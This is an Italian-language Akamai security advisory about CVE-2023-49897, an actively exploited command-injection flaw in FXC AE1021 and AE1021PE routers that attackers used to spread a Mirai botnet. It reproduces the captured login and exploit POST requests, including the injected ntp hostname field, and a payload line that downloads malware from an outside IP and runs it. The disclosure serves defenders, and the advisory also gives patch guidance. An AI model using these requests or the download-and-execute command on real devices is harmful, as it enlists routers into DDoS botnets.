Vi serve il cloud computing? Iniziate subito

Vulnerabilità sfruttata attivamente nei router FXC: correzioni e patch disponibili

Akamai Wave Blue

scritto da

Kyle Lefton, Chad Seaman, e Larry Cashdollar

December 06, 2023

Onda blu di Akamai

scritto da

Kyle Lefton

Kyle Lefton è Security Researcher del SIRT (Security Intelligence Response Team) di Akamai. Dopo aver svolto il ruolo di Intelligence Analyst per il Ministero della Difesa statunitense, Kyle ha maturato un'esperienza pluriennale in difesa informatica, ricerca sulle minacce e controspionaggio. Si occupa con passione di indagare sulle minacce emergenti, ricerca delle vulnerabilità e mappatura dei gruppi di minacce. Nel tempo libero, ama circondarsi di amici e parenti, dedicarsi ai giochi di strategia e fare escursioni all'aperto.

Chad Seaman headshot

scritto da

Chad Seaman

Chad Seaman is a Principal Security Researcher and Team Lead of Akamai’s Security Intelligence Response Team. He proudly refers to himself as an “Internet Dumpster Diver,” and enjoys looking through the muck and mire he finds there. Chad began his career as a programmer, and after being exposed to security, exploitation, and forensics via breach investigations, security quickly became his preferred work. He now spends his time engulfed in malware investigations, reverse engineering, vulnerability research, DDoS, and cybercrime investigations. He likes flying airplanes, poking holes in paper at a distance, and spending time in nature, preferably in the woods, on a trail, or on a dirt bike.

Larry Cashdollar

scritto da

Larry Cashdollar

Larry W. Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Nell'ambito del rilevamento di InfectedSlurs, il team SIRT ha scoperto una vulnerabilità nei router FXC AE1021 e AE1021PE che viene attivamente sfruttata in rete.

Questo blog è un aggiornamento del post pubblicato in precedenza dal team SIRT sulla campagna InfectedSlurs .

Analisi riassuntiva

  • Il team SIRT (Security Intelligence Response Team) di Akamai ha pubblicato un aggiornamento alla serie di raccomandazioni sulla campagna InfectedSlurs dopo il rilascio delle guide e delle versioni firmware corrette con patch da parte di uno dei fornitori interessati. 

  • Alla vulnerabilità è stato assegnato l'ID CVE-2023-49897 con un punteggio CVSS v3 di 8,0.

  • Tra i router interessati figurano i router FXC (Future X Communications) AE1021 e AE1021PE con le versioni firmware 2.0.9 e precedenti.

  • I payload dannosi acquisiti in rete installano un malware basato su Mirai con l'intenzione di creare una botnet DDoS (Distributed Denial-of-Service) .

  • Nella ricerca originale, abbiamo incluso un elenco completo degli indicatori di compromissione (IOC) e delle regole Snort e YARA per aiutare a identificare questi tentativi di sfruttamento in rete e le possibili infezioni attive sulle reti dei sistemi di difesa.

Cosa dovete sapere

Nell'ambito del rilevamento di InfectedSlurs, il team SIRT ha scoperto una vulnerabilità nei router FXC AE1021 e AE1021PE che viene attivamente sfruttata in rete. Questo dispositivo viene descritto come un router LAN wireless progettato per alberghi e unità residenziali. È stato prodotto in Giappone da FXC. A questa vulnerabilità è stato assegnato l'ID CVE-2023-49897 con un punteggio CVSS v3 di 8,0.

La vulnerabilità consente ad un criminale autenticato di sferrare un attacco di inserimento di comandi del sistema operativo (OS Command Injection) con un payload trasmesso tramite una richiesta POST all'interfaccia di gestione. Nella sua configurazione attuale, vengono utilizzate le credenziali predefinite del dispositivo nei payload acquisiti.

Le versioni firmware interessate sono:

  • Versione firmware AE1021PE 2.0.9 e versioni precedenti

  • Versione firmware AE1021 2.0.9 e versioni precedenti

Il fornitore (FXC) ha rilasciato una versione corretta con patch del firmware del dispositivo per correggere la vulnerabilità. Il fornitore suggerisce ai proprietari dei dispositivi di aggiornare il firmware alla versione 2.0.10 non appena possibile e di ripristinare le impostazioni di fabbrica dei propri dispositivi, cambiando anche la password di accesso alla schermata di gestione predefinita al primo avvio.

I suggerimenti del fornitore sono disponibili all'indirizzo https://www.fxc.jp/news/20231206 , mentre altri consigli sono stati pubblicati da JPCERT all'indirizzo https://jvn.jp/en/vu/JVNVU92152057/ (versione in giapponese: https://jvn.jp/vu/JVNVU92152057/).

Rilevamento di uno sfruttamento

I payload identificati in rete riguardano l'installazione di un malware basato su Mirai. La campagna si propone di creare una botnet con l'intento di sferrare attacchi DDoS più facilmente. Questa botnet è stata descritta in dettaglio nel nostro post iniziale.

 È difficile stimare quanti dispositivi presenti in rete siano potenzialmente vulnerabili o vengano attivamente violati perché i payload di attacco acquisiti si basano sull'uso delle loro credenziali di autenticazione predefinite.

Poiché il criminale deve essere autenticato, sono state osservate due interazioni generate dal criminale. Riteniamo che la prima di queste interazioni sia semplicemente un tentativo di fingerprinting. L'interazione è stata rivolta all'URL dell'endpoint /cgi-bin/login.apply utilizzando le credenziali predefinite (Figura 1).

  URL: /cgi-bin/login.apply
  Cookie: cookieno=489646; username=[redacted]; password=[redacted] 
  User-Agent: Go-http-client/1.1

  POST BODY:
  username_input=[redacted]&password_input=. [redacted]&lang=ja_JP&hashstr=202310281340&username=[redacted]&password=[redacted]

Figura 1. Tentativo di autenticazione del router FXC

In caso di riuscita dell'autenticazione, all'URL dell'endpoint /cgi-bin/action viene distribuito un payload dell'exploit circa tre secondi dopo (Figura 2).

  URL:/cgi-bin/action
  Cookie: username=[redacted]; password=[redacted]; cookieno=489646
  User-Agent: Go-http-client/1.1

  POST BODY:
page_suc=i_system_reboot.htm&system.general.datetime=&ntp.general.hostname=[RCE]&ntp.general.dst=0&ntp.general.dst.adjust=0&system.general.timezone=09:00&system.general.tzname=Tokyo&ntp.general.enable=1

Figura 2. Tentativo di sfruttamento del router FXC

I payload dell'exploit acquisiti in rete tentano di sfruttare la vulnerabilità OS Command Injection per distribuire una variante compilata da MIPS della botnet Mirai (Figura 3).

  cd /tmp; rm -rf mips; wget http://45.142.182.96/spl/mips; chmod 777 mips; ./mips accessedge

Figura 3. Payload di esecuzione di codice remoto  osservati in rete

Nella nostra pubblicazione iniziale, il team SIRT di Akamai ha fornito un elenco completo degli indicatori di compromissione (IOC) e delle regole Snort e YARA per aiutare a identificare questi tentativi di sfruttamento in rete e le possibili infezioni attive sulle reti dei sistemi di difesa.

Conclusione

Le campagne che prendono di mira l'IoT (Internet of Things) causano innumerevoli istanze, in cui i dispositivi utilizzati ogni giorno dagli utenti vengono inconsapevolmente coinvolti in una serie di azioni dannose. Le botnet DDoS e gli schemi di cryptomining sono solo alcuni dei risultati che possono verificarsi a totale insaputa degli utenti i cui dispositivi sono interessati. In alcuni casi, gli utenti potrebbero addirittura non sapere che è possibile cambiare le credenziali su questi dispositivi.

Questa rivelazione mette in evidenza la necessità di aumentare la consapevolezza e l'informazione sulle best practice relative all'IoT e sui rischi associati al consumatore medio. La necessità di consapevolezza non è esclusiva dei consumatori: riguarda anche i produttori di questi dispositivi da "impostare e dimenticare".

Le procedure di sicurezza di base sono fondamentali

Le procedure di base sono fondamentali. Queste osservazioni ancora una volta evidenziano l'importanza di seguire procedure di sicurezza di base, come cambiare le password predefinite sui dispositivi durante la configurazione iniziale, come anche di implementare protocolli proattivi che garantiscono una sicurezza ancora maggiore nel lungo termine, come aggiornare costantemente i sistemi per proteggerli da potenziali attacchi e controllare occasionalmente i sistemi/dispositivi, specialmente se si notano comportamenti insoliti.

Tenetevi al passo

L'Akamai Security Intelligence Group continuerà a monitorare minacce come queste e fornirà i relativi rapporti per aumentare la consapevolezza nei nostri clienti e nella comunità della sicurezza in generale. Per ulteriori ricerche, seguiteci su X(in precedenza, noto come Twitter) per tenervi aggiornati su ciò che stiamo osservando.

Il team SIRT di Akamai desidera ringraziare tutti in CISA, US- CERT, CERT e FXC per la loro assistenza nel processo di comunicazione, coordinamento, identificazione, mitigazione e divulgazione.

Desideriamo anche ringraziare Ryu Kuki, Takayuki Sasakie Katsunari Yoshioka della Yokohama National University per il loro scrupoloso lavoro. Anche se non abbiamo lavorato con loro direttamente, ci è stato riferito che hanno segnalato la stessa vulnerabilità a JPCERT e FXC approssimativamente nello stesso periodo in cui abbiamo pubblicato i nostri rapporti.  È sempre straordinario trovare esperti di sicurezza che si impegnano attivamente nel rendere Internet un posto migliore e più sicuro per tutto.



Akamai Wave Blue

scritto da

Kyle Lefton, Chad Seaman, e Larry Cashdollar

December 06, 2023

Onda blu di Akamai

scritto da

Kyle Lefton

Kyle Lefton è Security Researcher del SIRT (Security Intelligence Response Team) di Akamai. Dopo aver svolto il ruolo di Intelligence Analyst per il Ministero della Difesa statunitense, Kyle ha maturato un'esperienza pluriennale in difesa informatica, ricerca sulle minacce e controspionaggio. Si occupa con passione di indagare sulle minacce emergenti, ricerca delle vulnerabilità e mappatura dei gruppi di minacce. Nel tempo libero, ama circondarsi di amici e parenti, dedicarsi ai giochi di strategia e fare escursioni all'aperto.

Chad Seaman headshot

scritto da

Chad Seaman

Chad Seaman is a Principal Security Researcher and Team Lead of Akamai’s Security Intelligence Response Team. He proudly refers to himself as an “Internet Dumpster Diver,” and enjoys looking through the muck and mire he finds there. Chad began his career as a programmer, and after being exposed to security, exploitation, and forensics via breach investigations, security quickly became his preferred work. He now spends his time engulfed in malware investigations, reverse engineering, vulnerability research, DDoS, and cybercrime investigations. He likes flying airplanes, poking holes in paper at a distance, and spending time in nature, preferably in the woods, on a trail, or on a dirt bike.

Larry Cashdollar

scritto da

Larry Cashdollar

Larry W. Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.